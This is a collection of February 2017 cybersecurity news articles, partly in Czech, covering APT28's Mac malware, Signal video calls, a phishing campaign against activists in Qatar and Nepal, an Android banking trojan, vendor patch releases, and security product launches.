The researchers plan to present their paper at the Network and Distributed System Security Symposium scheduled for February 26 through March 1 in San Diego, California.
Russian Cyberspies Use New Mac Malware to Steal Data
15.2.2017 securityweek Apple
Researchers have discovered a new piece of malware used by the Russia-linked threat group known as APT28 to steal sensitive data from Mac devices, including backups and passwords.
APT28 is also tracked as Fancy Bear, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit. The threat actor has been linked to several high-profile attacks aimed at government and other types of organizations around the world, including the recent election-related hacker attacks in the United States.
APT28 has been known for using an OS X downloader named Komplex, and researchers from Bitdefender and Palo Alto Networks have now come across another Mac malware believed to be part of the group’s arsenal.
XAgent, or X-Agent, is a Trojan used by APT28 in attacks targeting Windows systems. A recently analyzed campaign aimed at Ukraine indicates that the group may have also developed an Android version of XAgent.
Bitdefender and Palo Alto Networks have also identified a macOS version of XAgent, which they believe is downloaded to targeted systems by the Komplex downloader. Both security firms determined, based on binary strings, that Komplex and XAgent were likely created by the same developer.
Once it infects a Mac computer, the malware, which its authors call XAgentOSX, contacts a command and control (C&C) server and waits for instructions. C&C communications are similar to the ones used by the Windows version of XAgent.
XAgentOSX can collect information about the system, running processes and installed applications, it can download and upload files, execute commands and files, and take screenshots.
The malware also looks for backup files from an iPhone or iPad, which it can exfiltrate using one of the available commands. XAgentOSX can also log keystrokes, allowing the attackers to obtain the victim’s credentials.
Bitdefender told SecurityWeek that it does not have any information on XAgentOSX infections and targets, but the company believes the victims are hand-picked in an effort to prevent the exposure of malware samples.
“Most likely, this sample is directed at the same audience that makes the focus of the APT28 group (government, airspace, telecom and, e-crime services). It most likely covers the instances in which targets in the respective groups use Macs as work or personal computers,” said Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender.
APT28 is a sophisticated threat group whose arsenal includes a wide range of tools, including Linux malware. One of the actor’s favorite Linux tools is Fysbis, an unsophisticated yet efficient backdoor.
Signal introduced the Video call feature in public beta release
15.2.2017 securityaffairs Apple
Signal, the most secure instant messaging app, introduced the Video call feature in public beta release. You can test is now!
Signal is considered the most secure instant messaging app, searching for it on the Internet it is possible to read the Edward Snowden’ testimony:
“Use anything by Open Whisper Systems” Snowden says.
The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app
News of the day is that the Signal app released video calling feature on Tuesday for both Android and iOS.
The new feature will allow Signal users to make face-to-face through video calling with a specific focus on security.
The Signal video calling feature implements the support for CallKit on iOS 10 devices, a recently introduced framework that lets users’ VoIP app integrate tightly with the native Phone UI.
The Callkit in iOS 10 allows Signal users to answer calls just like regular calls, but there are some specific privacy issues that must be carefully considered.
“CallKit offers a native calling experience to VoIP apps like Signal. As well as being able to answer calls directly from your lock screen, you’ll also see Signal calls in the system’s “Recent Calls” list. This is because iOS treats CallKit calls like any other call, however that also means some information will be synced to iCloud if enabled. This information includes who you called and how long you talked.” wrote Moxie Marlinspike.
CallKit could be disabled by Signal iOS users to enhance the privacy.
The Signal’s video calling feature is still in beta, in order to make a video call both users will have to enable the feature.
If you wan to try the new feature go into your Signal settings and enable ‘Video calling beta’ under ‘Advanced.’
“If you decide that’s not for you, you can opt-out of the CallKit features at any time in Settings > Advanced > Use CallKit, while continuing to use the rest of the new calling system.” continues Moxie Marlinspike.
Operation Kingphish: Cyber Attacks against human rights activists in Qatar and Nepal
15.2.2017 securityaffairs Cyber
Amnesty International has recently uncovered a spear phishing campaign dubbed Operation Kingphish that targeted groups in Qatar and Nepal.
Human rights organizations and journalists continue to be a privileged target of phishing campaigns that attempt to steal the Google credentials of the victims. The malicious messages try to lure victims into viewing documents online.
Amnesty International has recently uncovered a spear phishing campaign that targeted groups in Qatar and Nepal leveraging a fake social media profile, the attackers did not directly hit people working for Amnesty International.
Threat actor created a fictional rights activist named Safeena Malik.
Amnesty International dubbed the phishing campaign ‘Operation Kingphish’ because the surname “Malik” translates from Arabic as “King.”
“Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by “Safeena Malik”, seemingly an enthusiastic activist with a strong interest in human rights.” reads a blog post published by popular researcher Claudio Guarnieri on Medium. “What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal.”
The threat actors created profiles for the character “Safeena Malik” on every social media, including Facebook, Google, LinkedIn, and Twitter. The information used by the attackers seems to have been harvested from another social media account.
“The various social media accounts communicated regularly with several of the victims we identified, often for many months. It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile, along with a professional biography also stolen from yet another person.” added Claudio Guarnieri.
Among the various profiles created for Safeena Malik, the most active appear to be the Facebook and LinkedIn once. (where the identity had accumulated more than 500 connections).
The LinkedIn profile has built a network composed of more than 500 connections. The attackers targeted individuals associated with the rights of migrant workers in Qatar, journalists, activists, and labor union officials.
A large number of workers from Nepal and other countries have been brought to Qatar to work with companies involved in the construction of stadiums and facilities for the 2022 World Cup, so human rights activists are concerned over the treatment of those workers. It has been estimated that more than 1,200 migrant workers from Nepal and India have already died.
Victims of the spear phishing campaign received malicious email and social media messages from “Safeena Malik,” who was asking them to view the content of documents or presentations on Qatari human rights issues.
In other cases, the attackers were offering forged requests to link up via Google’s Hangouts chat service.
The phishing messages included links to a phishing site crafted specifically trick visitors into providing their Google login credentials. Once the victims provided the credentials, they were redirected to an actual Google Docs document pilfered from another source to avoid suspicions.
Who is behind the Operation Kingphish?
“in the absence of clear evidence, trying to identify the entity behind this attack can only be speculative. ” states Guarnieri.
Despite the lack of conclusive evidence, the fact that the spear phishing attacks specifically target individuals active on human rights issues in Qatar, suggests the involvement of a state-sponsored actor. We believe it is also possible that these attacks have been orchestrated by contractors.
“We believe it is also possible that these attacks have been orchestrated by contractors.” concluded Guarnieri.
The Qatari government has denied involvement in the Operation Kingphish campaign.
Na české uživatele Androidu míří další vlna malwaru. Co vir Android/Spy.Banker.HO dokáže?
15.2.2017 Živě.cz Android
Do Česka dorazila další vlna falešných aplikací, tentokrát se vydávají za DHL
Za cíl mají krádež přihlašovacích údajů do bankovnictví
Jak se těmto podvodům bránit?
Minimálně od poloviny ledna narážíme každý týden na několik upozornění před škodlivou aplikací pro Androidy, kterou útočníci šíří pomocí SMS. Nejčastěji rozesílají zprávy vydávající se za některou z českých bank, nicméně problémům se nevyhnula ani Česká pošta, e-shop Alza a nejnovější případ se týká přepravní společnosti DHL.
Vzorec útoku je vždy stejný: uživateli dorazí SMS s textem vztahující se k danému subjektu a požadavkem na stáhnutí aplikace. Falešné zprávy od České pošty tak obsahovaly výzvu k vyzvednutí zásilky na depu, u bank útočníci nejčastěji používají variantu s důležitým sdělením, jež má být přečteno právě v odkazované aplikaci, u Alzy slibují výhru a u DHL nabízí v aplikaci změnu doručovací adresy pro dodání balíku.
Dvě aplikace, stejný malware. Jednou se vydává za aplikaci České pošty, podruhé za DHL, ve většině případů však nese název Flash Player 10 Update
Prvním poznávacím prvkem podvodné aplikace může být už adresa, z níž má být stažena. Doposud totiž útočníci vždy použili doménu .online – u Alzy to byla adresa http://alza-shop.online, u DHL je to nyní http://dhl-express.online a u pošty využívali útočníci líbivou adresu http://ceskaposta.online. I díky těmto URL se mohou zprávy pro mnohé uživatele tvářit jako legitimní.
Takto může vypadat podvodná zpráva, tahle se konkrétně vydává za Českou poštu (foto: @TerezaChlubna)
Dalším společným rysem těchto podvodných aplikací je jejich minimální velikost. Při stahování instalačního balíku APK to je vždy pod 1 MB, po instalaci se potom u všech zmíněných verzí velikost pohybovala kolem 1,4 MB. Při spuštění si aplikace samozřejmě vyžádá všechna oprávnění v systému, a pokud je uživatel odsouhlasí, umožní aplikaci nejen přístup do kontaktů, ale například i možnost číst a odesílat zprávy.
Aplikace si vyžádá kompletní systémová oprávnění díky nimž se později může dostat například k ověřovací SMS pro přihlášení do bankovnictví
Základní obranou proti tomuto typu útoku by však měla být především obezřetnost a také zdravý rozum. Pokud uživatel nečeká zásilku od České pošty či DHL nebo mu přijde zpráva z banky, u níž není klientem, je podvod nejpravděpodobnější variantou. Problémem může být například zpráva z Alzy slibující výhru při instalaci aplikace, kdy podobné způsoby promování svých aplikací by mohly některé společnosti opravdu využívat. U všech variant by však mělo platit základní pravidlo neinstalovat aplikace z cizích zdrojů a spoléhat se na integrovaný obchod Google Play.
Podvržené bankovnictví
Pokud uživatel aplikaci nainstaluje, ta běží na pozadí a čeká na svoji příležitost až bude moci naservírovat podvodný přihlašovací formulář do internetového bankovnictví. To se může stát nejen při spuštění samotné podvodné aplikace, ale i při spuštění dalších služeb. Jedna z variant malwaru Android/Spy.Banker tak zobrazovala formulář pro zadání platebních údajů při každém spuštění některého z komunikátorů – Skype, Facebook Messengeru, Hangouts, ale i u sociálních sítí jako je Instagram nebo Twitter.
Aplikace může zobrazovat také formuláře pro zadání údajů platební karty (foto: Fortinet)
U nás se však uživatelé budou setkávat především s lokalizovanou variantou upravenou pro české uživatele. V případě posledního útoku, který využívá jméno přepravce DHL jde čistě o phishing, kdy je po otevření aplikace zobrazen přihlašovací formulář do internetového bankovnictví ČSOB. V případě, že uživatel zadá svoje identifikační číslo a kód PIN, útočníci už mají jednoduchou práci. I k případné ověřovací SMS totiž mají přístup díky udělenému oprávnění číst zprávy.
Pokud uživatel spustí aplikaci, naservíruje mu přihlašovací formulář do internetového bankovnictví. K ověřovací SMS už má také přístup a v napadení účtu mu po zadání údajů nic nebrání (foto: ČSOB)
Aktuálně hrozí trojan Android/Spy.Banker především ve východní Evropě, což je vidět také na mapě společnosti Eset. K jeho rozšíření však došlo už na podzim loňského roku, kdy byl ve své původní podobě využíván pro krádeže přihlašovacích údajů do bankovnictví v Německu, Francii či Rakousku a v menší míře Polsku či Spojených státech.
Aktuálně se malwaru Android/Spy.Banker daří hlavně ve východní Evropě, nejvíc v Rusku a na Slovensku (foto: Eset)
Aktuální vlna útoků je nebezpečná především pečlivou lokalizací – ať už se týká jak doručovaných zpráv, v nichž nenajdeme chyby, tak již zmíněných domén, které se opravdu tváří jako oficiální. Pokud jste aplikaci spustili a zadali do ní údaje, neváhejte s kontaktováním zákaznické linky vaší banky. Aplikaci odinstalujte běžným způsobem v nastavení Androidu a nabídce Aplikace. Velmi často nese název Flash Player 10 Update, v některých případech však útočníci změnili i jméno na DHL nebo Česká pošta.
Signal Messaging App Rolls Out Encrypted Video Calling
15.2.2017 thehackernews Apple
WhatsApp and Facebook have so far the largest end-to-end encrypted video calling network of all, but now another popular end-to-end encrypted messaging app recommended by whistleblower Edward Snowden is ready to give them a really tough competition.
The Signal app, which is widely considered the most secure of all other encrypted messaging apps, released video calling feature on Tuesday for both Android and iOS in a new update.
Developed by open source software group Open Whisper System, Signal is a free and open source messaging application specially designed for Android and iOS users to make secure and encrypted messages and voice calls.
Even the Signal Protocol powers the end-to-end encryption built into WhatsApp, Facebook Messenger, and Google Allo's Incognito mode as well.
Signal has already been providing fully end-to-end encrypted chat and voice calling features, but the newly added feature will make it even easier for privacy conscious people to convey their information face-to-face through video calling without compromising security.
Watch Out! There's a Privacy issue too!
This new video calling feature also comes with support for CallKit on iOS 10 devices, a new framework that makes Signal act more like the regular phone app.
Callkit in iOS 10 allows Signal users to answer calls from with one touch through their device's lock screen and lists those calls on the device's native "Recent Calls" just like regular calls, possibly making it inconvenient for privacy-minded people.
CallKit is optional, and if users decide to opt-in this feature, some of their data might sync to Apple's iCloud servers, including who the Signal users called and how long they had the conversation, Signal's pseudonymous lead designer Moxie Marlinspike explains in a blog post.
The CallKit feature can be turned off within your iOS device's settings to enhance your privacy.
Currently, Signal’s video calling feature is in beta, which means both users will have to enable the feature for video calling to work manually.
To try out video calling in Signal, you will have to go into your Signal settings and enable 'Video calling beta' under 'Advanced.'
BitDefender found the first MAC OS version of the X-Agent used by the APT28
15.2.2017 securityaffairs APT
Security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at BitDefender have discovered a MAC OS malware program that’s likely part of the arsenal of the dreaded Russian APT 28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during 2016 Presidential election.X-Agent APT 28
The researchers believe the group has developed a malware called Sofacy or X-Agent that was associated only with its espionage campaigns.
The experts observed several strains of the X-Agent specifically designed to compromise Windows, Linux, iOS and Android OSs.
Now researchers at Bitdefender have spotted the first version of the X-Agent that was developed to compromise MAC OS systems.
The security firm hasn’t revealed how it has discovered the MAC OS version of the X-Agent, and currently, there is no information on the attack chain.
“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.
The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.
The X-Agent malware is able to load additional modules, it could be used as backdoor or to perform a reconnaissance on the target system by gathering information of hardware and software components of the target host.
In September 2016, Palo Alto researcher Ryan Olson, discovered that Fancy Bear used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.
““The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by PaloAlto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.””
The Komplex malware has numerous similarities with the Carberp trojan, it was improved to gain access on PC and OS X systems and use the same command-and-control server.
The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.
The new MAC OS X-Agent leverages domain names similar to the one used by Komplex Trojan, they only differ for the TLD. The researchers noticed identical project path strings inside both the Komplex and X-Agent samples, a circumstance that suggests the involvement of the same development team.
“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.
Summarizing, the Komplex component discovered in September 2016 has been exclusively used as a downloader and installer for the X-Agent binary.
The investigation is ongoing … stay tuned!
Adobe just fixed thirteen code execution flaws in Flash Player
15.2.2017 securityaffairs Vulnerebility
Adobe addressed thirteen highest severity code execution vulnerabilities in Flash Player for Windows, MAC OS, and Chrome.
Adobe released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions, and the Campaigns marketing tool.
Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. The updates address critical vulnerabilities that could be exploited by an attacker to take control of the vulnerable system.
Flash Player 24.0.0.221 addressed 13 critical code execution flaws, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the Adobe Security Advisory for the Flash product.
The flaws were discovered by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs who reported the security issued to Adobe.
Nine flaws affecting the Digital Editions ebook reader were also fixed by Adobe with the release of version 4.5.4 for Windows, Mac, and Android.
Adobe fixed several kinds of vulnerabilities including a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.
The flaws were discovered by the researcher Steven Seeley of Source Incite and Ke Liu of Tencent’s Xuanwu LAB.
“Adobe has released a security update for Adobe Digital Editions for Windows, Macintosh and Android. This update resolves a critical heap buffer overflow vulnerability that could lead to code execution and important buffer overflow vulnerabilities that could lead to a memory leak.” reads the Adobe Security Advisory for the Digital Editions product.
Adobe Flash Player flaws
The last set of flaws was affecting the Adobe Campaign product for Windows and Linux, the release of Adobe Campaign 6.11 addresses a moderate severity security bypass flaw affecting the client console. The flaws could be exploited by an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.
The experts also fixed another flaw in the latest version of Campaign, it is a moderate severity input validation issue that can be exploited for cross-site scripting (XSS) attacks. The flaws were reported to Adobe by researcher Léa Nuel.
“Adobe has released a security update for Adobe Campaign v6.11 for Windows and Linux. This update resolves a moderate security bypass affecting the Adobe Campaign client console. An authenticated user with access to the client console could upload and execute a malicious file, potentially resulting in read and write access to the system (CVE-2017-2968). This update also resolves a moderate input validation issue that could be used in cross-site scripting attacks (CVE-2017-2969).” reads the Adobe Security Advisory for the Adobe Campaign product.
SAP Patches 22 Vulnerabilities With February 2017 Security Updates
14.2.2017 securityweek Vulnerebility
SAP on Tuesday announced the release of its February 2017 security updates, which includes 15 Patch Day Security Notes and 3 updates to previously released Patch Day Security Notes.
Only High risk and Medium severity vulnerabilities were addressed this month, with the highest CVSS score of the vulnerabilities being 8.5. Multiple patches were released for SAP's HANA database management system.
According to ERPScan, a company specialized in securing SAP and Oracle products, SAP’s February 2017 Security Patch Day also saw the release of 7 Support Package Notes, for a total of 22 patches across products. 7 of the patches were rated High risk, while the remaining 15 were assessed as Medium severity.
The most common vulnerability type addressed this month is Missing Authorization check (5 patches), followed by Cross-Site Scripting (4 patches), denial of service (3 patches), and XML external entity (2 patches). The remaining 8 flaws include: directory transversal, implementation flaw, privilege escalation, buffer overflow, ABAP code injection, cross-site request forgery, clickjacking, and multiple issues.
The most important issues addressed this month include a Missing Authorization Check vulnerability (CVSS Base Score: 8.5) in SAP Netweaver Data Orchestration (which could allow an attacker to access the service without authorization and use service functionality that has restricted access), along with an Implementation flaw vulnerability (CVSS Base Score: 8.2) in SAP GRC Access Control EAM (which can cause unpredictable behavior of a system, troubles with stability and safety).
Additionally, SAP patched a Memory Corruption vulnerability (CVSS Base Score: 8) in SAP 3D Visual Enterprise Author, Generator and Viewer, which could allow an attacker to inject a specially crafted code into a working memory which will be executed by the vulnerable application (the executed commands run with the same privileges as the service that executed the command).
Three of the issues were disclosed by ERPScan researchers, including multiple vulnerabilities in SAP HANA (CVSS Base Score: 8.3) – namely a denial of service that could allow an attacker to crush a process of a vulnerable component, and an Implementation Flaw (insecure default user creation policy) in third-party repository server Sinopia –, and an XML external entity vulnerability in SAP Visual Composer VC70RUNTIME (CVSS Base Score: 6.5).
The vulnerabilities in SAP HANA can be exploited together, ERPScan says: “The first vulnerability allows an attacker to create a new user over the Internet without authentication. After that, an adversary can create a new repository. If a package name contains special characters, the server will crash. As a result of the attack, the project would be unavailable meaning a stoppage of developing processes. Moreover, the vendor’s advisory states that other SAP HANA XS components also could be potentially impacted.”
In related news, Microsoft announced on Tuesday that a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.
ExtraHop Introduces Real Time Wire-Level Threat Detection
14.2.2017 securityweek Safety
IT analytics firm ExtraHop Networks today announced ExtraHop Addy, a cloud-based machine-learning wire data analytical tool that is being trained to automatically detect anomalies on the fly as they are happening.
Seattle, Washington-based ExtraHop was born in 2007. It was founded by senior architects Raja Mukerji and Jesse Rothstein, formerly from F5 Networks, with a vision of tapping wire data to provide the most complete and definitive information on the current state of the IT infrastructure. Since then ExtraHop has picked up hundreds of global customers, including Sony, Lockheed Martin, Microsoft, Adobe, and Google.
But the working of the infrastructure is not the only diagnosis that can be drawn from wire data. Wire data has been described by Rothstein as "everything on the network, from the packets to the payload of individual transactions. It is a very deep, very rich source of data... And it's definitive." Inevitably, within that data, are any and all subtle indications of cyber security compromise.
Machine-learning threat detection tools are not new. For the most part, however, they are high-speed forensic tools that rapidly analyze huge volumes of log data -- they can tell you what happened, but not necessarily what is happening.
Addy is a new SaaS offering that takes the data already derived from ExtraHop Network and analyzes it in the cloud. It builds a continuous baseline of normal behavior for every device on the network; it then analyzes what is happening against what it would expect to happen; and it highlights anomalies or issues to the IT team -- or the security team. This takes its potential beyond IT infrastructure monitoring into real time threat detection.
Early access customers have already demonstrated Addy's security value. One large cable company detected a server unexpectedly probing other systems in the datacenter; and were immediately able to shut down the compromised server. A financial services firm was able to detect the Dyn DDoS attack in real time and route DNS traffic through an unaffected region to avoid downtime. And a national medical institution averted two potential security breaches when Addy detected international servers probing their DNS, as well as reverse DNS lookups.
Addy learns from both the customer's own environment and also crowd-sourced domain expertise. This means that the behavioral baseline for every device in the network is continuously improving, the accuracy of alerts is increasing, and false positives are minimized.
For the most part, the wire data sent to the cloud for analysis is kept in customer-specific compartments. Although that data includes nothing personally identifiable, this is an added assurance for customers concerned with any form of network data sharing, or are otherwise concerned about the evolving data protection laws.
"ExtraHop provides a real-time view across the entire IT environment," explains Rothstein. "With Addy, we're taking the next step, applying machine learning techniques to this vast data set while leveraging the scale, elasticity, and compute power of the cloud."
Addy is available through an Early Access Program for select participants now, and will be available generally in April 2017.
Last Minute Issue Delays Microsoft Security Updates
14.2.2017 securityweek Vulnerebility
Microsoft has apologized to customers “for any inconvenience” after a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.
“Our top priority is to provide the best possible experience for customers in maintaining and protecting their systems. This month, we discovered a last minute issue that could impact some customers and was not resolved in time for our planned updates today,” Microsoft said. “After considering all options, we made the decision to delay this month’s updates.”
The security updates released by the company for January 2017 consisted of only four bulletins, including one for Flash Player fixes. It is unclear how many flaws will be patched this month, but many hope Microsoft will address the recently disclosed denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.
Starting with this month, Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide. For January, the company published both security bulletins and some release notes in the Security Updates Guide.
Microsoft has recently introduced a new patch process that includes a Monthly Rollup, which contains both security and non-security fixes, a preview of the Monthly Rollup, and security-only updates.
In order to reduce the size of the security-only update, starting with this month, Internet Explorer patches will be made available as a separate update. The Monthly Rollup will include all patches, including the ones for IE.
The decision to separate the browser updates was made after users asked Microsoft to provide increased flexibility by allowing them to independently deploy Windows and Internet Explorer patches.
Johannes B. Ullrich, dean of research at the SANS Technology Institute, speculated that this change in process may have caused this month’s delay.
Simulation Shows Threat of Ransomware Attacks on ICS
14.2.2017 securityweek Virus
Researchers at the Georgia Institute of Technology have demonstrated the potential impact of ransomware on industrial control systems (ICS) by simulating an attack aimed at a water treatment plant.
David Formby, a Ph.D. student in the Georgia Tech School of Electrical and Computer Engineering, and his faculty advisor, Raheem Beyah, identified several commonly used programmable logic controllers (PLCs) and tested three of them to determine how easily they can be hacked.
Once the devices were tested, including their password security and susceptibility to unauthorized configuration changes, the experts combined them with tubes, pumps and tanks in order to simulate a water treatment facility.
The attack simulation shows how an attacker with access to the PLCs can close valves, display false information to the operator, and increase the amount of chlorine added to the water.
“We were able to simulate a hacker who had gained access to this part of the system and is holding it hostage by threatening to dump large amounts of chlorine into the water unless the operator pays a ransom,” Formby said. “In the right amount, chlorine disinfects the water and makes it safe to drink. But too much chlorine can create a bad reaction that would make the water unsafe.”
Formby and Beyah discovered 1,400 instances of a single PLC type being accessible from the Internet, and pointed out that the organizations housing them often believe the devices are not vulnerable to attacks.
Related: Exploring Risks of IT Network Breaches to Industrial Control Systems (ICS)
Ransomware attacks typically target data, even if the victim is a critical infrastructure organization. Last year, the Board of Water and Light (BWL) in Lansing, Michigan, was targeted with ransomware, but the attack affected its corporate network and there was no disruption to water or energy supplies.
However, Formby, Beyah and other experts believe profit-driven cybercriminals could increasingly attack ICS, especially since these systems are often poorly protected.
Experts recently raised concerns about ransomware being brought into the industrial domain when KillDisk, a disk-wiping malware used in high-profile attacks aimed at ICS, had been modified to include ransomware capabilities.
HPE Launches Threat Investigation, IoT Data Security Products
14.2.2017 securityweek Security
Hewlett Packard Enterprise (HPE) announced on Tuesday the launch of a new threat investigation solution, ArcSight Investigate, and a new SecureData product for IoT and big data.
HPE Security ArcSight Investigate is a product designed to provide security operations center (SOC) teams fast and intuitive search functionality to help them identify and respond to significant threats.
ArcSight Investigate can be integrated with Hadoop and other ArcSight products, including Data Platform (ADP) and Enterprise Security Manager (ESM).HPE
The product is expected to become generally available in the second quarter. In the meantime, organizations interested in ArcSight Investigate can sign up for the early access program.
HPE has also unveiled SecureData for Hadoop and IoT. The product enables organizations to secure IoT data at rest, in transit and in use through integration with the Apache NiFi data processing and distribution platform.
As for protecting big data, HPE SecureData for Hadoop and IoT integrates with Hortonworks DataFlow (HDF) in order to secure information throughout the dataflow management and streaming analytics process. HPE says the original format of the encrypted data is preserved for processing and enabling secure big data analytics.
“While IoT and big data analytics are driving new ways for organizations to improve efficiencies, identify new revenue streams, and innovate, they are also creating new attack vectors for leaking sensitive information to adversaries,” said HPE’s Albert Biketi. “HPE SecureData enables business users to easily build data security in, delivering persistent protection in IoT and big data ecosystems, and allowing organizations to securely innovate.”
HPE SecureData for Hadoop and IoT is generally available worldwide as part of the company’s SecureData offering.
IBM's Watson Aims its Power at Security Operations Centers
14.2.2017 securityweek Security
Insider IBM's Cyber Range in Cambridge MA
Watson for Cyber Security Integrates With IBM's New Cognitive Security Operations Center
The power of IBM's cognitive computing Watson has been directed at cyber security. For the last year, Watson has been absorbing the collective knowledge of a million cyber security studies, scientific reports and analyses. Now Watson is ready to stand behind the shoulders of the analysts that sift through the network alerts thrown up by the QRadar security intelligence platform in what IBM calls its Cognitive SOC.
Watson's purpose is to advise the analysts. It gains its knowledge through parsing the free text documents that hold the greater part of the world's security knowledge. Human analysts could never read the volume of data that is available -- but it is light work for a machine. Watson takes free text documents and parses them; absorbing key knowledge and relationships. Some of the data it absorbs could be wrong; but Watson relies on the power of collective crowd knowledge to sift the wheat from the chaff. The result is a huge and accessible corpus of security expertise.
IBM LogoThe human analysts are also struggling with the sheer volume of events coming from their security intelligence platform. According to IBM, security teams must sift through up to 200,000 security events every day. Most of these are false positives that still need to be checked; but the result is up to 20,000 hours wasted every year. This is expected to double over the next five years.
Given the dearth of analysts, and especially the sparsity of expert analysts, this is a problem that will only get worse. Security intelligence platforms, such as QRadar, can generate huge volumes of warnings -- they create their own subset of Big Data. But the bloom of Big Data is wearing thin: the haystack is getting bigger, but mostly it just makes finding the needle harder.
Watson hides its own big data of knowledge within the machine, and then uses the power of the machine to direct the analyst to more targeted threat hunting in the QRadar alerts. The new app, IBM QRadar Advisor with Watson, is the first tool to tap Watson's security insights; and is already being used by 40 IBM customers including Avnet, University of New Brunswick, Sogeti.
"Today's sophisticated cybersecurity threats attack on multiple fronts to conceal their activities, and our security analysts face the difficult task of pinpointing these attacks amongst a massive sea of security-related data," explains Sean Valcamp, Chief Information Security Officer at Avnet.
"Watson makes concealment efforts more difficult by quickly analyzing multiple streams of data and comparing it with the latest security attack intelligence to provide a more complete picture of the threat. Watson also generates reports on these threats in a matter of minutes, which greatly speeds the time between detecting a potential event and my security team's ability to respond accordingly."
While Watson and QRadar are the key elements of the Cognitive SOC, IBM is extending it to the endpoint with the announcement of BigFix Detect. This is an endpoint detection and response (EDR) solution designed to detect and respond to malicious behavior in endpoints.
"The Cognitive SOC is now a reality for clients looking to find an advantage against the growing legions of cybercriminals and next generation threats," said Denis Kennelly, Vice President of Development and Technology, IBM Security. "Our investments in Watson for Cybersecurity have given birth to several innovations in just under a year. Combining the unique abilities of man and machine intelligence will be critical to the next stage in the fight against advanced cybercrime."
IBM is planning to improve the analyst (man) Watson (machine) interface with a new research project code-named Havyn -- a voice-powered security assistant that will make Watson respond to the analysts' verbal commands and natural language. IBM is not the only vendor seeking to use natural language as the interface between man and machine. Earlier this month Dynatrace announced Davis focused on monitoring the IT ecosystem. "It gives," announced the firm, "non-technical teams the ability to monitor and understand network health and performance issues via familiar communication tools. 'davis' has effectively 'consumerized' IT – this is an industry first."
Similarly, Endgame announced Artemis in late January. Artemis is a natural language chat interface between analysts and the Endgame Detect and Respond platform. The purpose behind Havyn, Davis and Artemis is to reduce the time spent by analysts in hunting out threats.
The IBM Cognitive SOC can be built on premise or built in the cloud through IBM Managed Security Services.
In November 2016, IBM Security unveiled a new global headquarters in Cambridge, Massachusetts, which features a physical Cyber Range designed to allow organizations in the private sector to prepare for and respond to cyber threats.
Qualys Expands Detection, Web App Security, and Data Sharing Portfolio
14.2.2017 securityweek Security
SAN FRANCISCO - RSA CONFERENCE 2017 - Cloud-based security and compliance solutions provider Qualys this week announced new tools and features to provide customers with improved detection capabilities, expanded web application security features, and improved vulnerability data sharing.
Qualys added two new detection solutions to its Cloud Platform, in the form of Qualys File Integrity Monitoring (FIM) and Indicators of Compromise (IOC), both meant to deliver more critical security and compliance functions in a single cloud-based dashboard. FIM and IOC bring to the Qualys Cloud Agent a combination of prevention and detection by adding continuous visibility of breaches and system changes to the single-pane view of security and compliance posture that the Agent already offers.
Qualys FIM was designed to log and centrally track file change events across global IT systems, while offering a single-view dashboard for identifying critical changes, incidents, and audit risks caused by various factors, including normal patching and administrative tasks, change control exceptions or violations, and malicious activity.
A cloud-based solution, FIM doesn’t require the deployment and maintenance of complex security infrastructure, which also results in improved compliance, reduced downtime, and limited damage from compromise. With FIM, customers get features such as out-of-the-box profiles based on industry best practices and vendor-recommended guidelines, real-time change engine to monitor files and directories specified in the monitoring profile, and automated change reviews of workflows.
Qualys IOC, on the other hand, continuously monitors endpoint activity for suspicious activity that could signal the presence of known malware, unknown variants, and threat actor activity on devices both on and off the network. The solution brings together endpoint detection, behavioral malware analysis, and threat hunting techniques, the company says.
Qualys IOC provides customers with continuous event collection through Cloud Agent's data collection and delta processing techniques, as well as with highly scalable detection processing (as analysis, hunting, and threat indicator processing are performed in the cloud). Moreover, the solution offers actionable intelligence for security analysts, to help them prioritize responses for critical business systems.
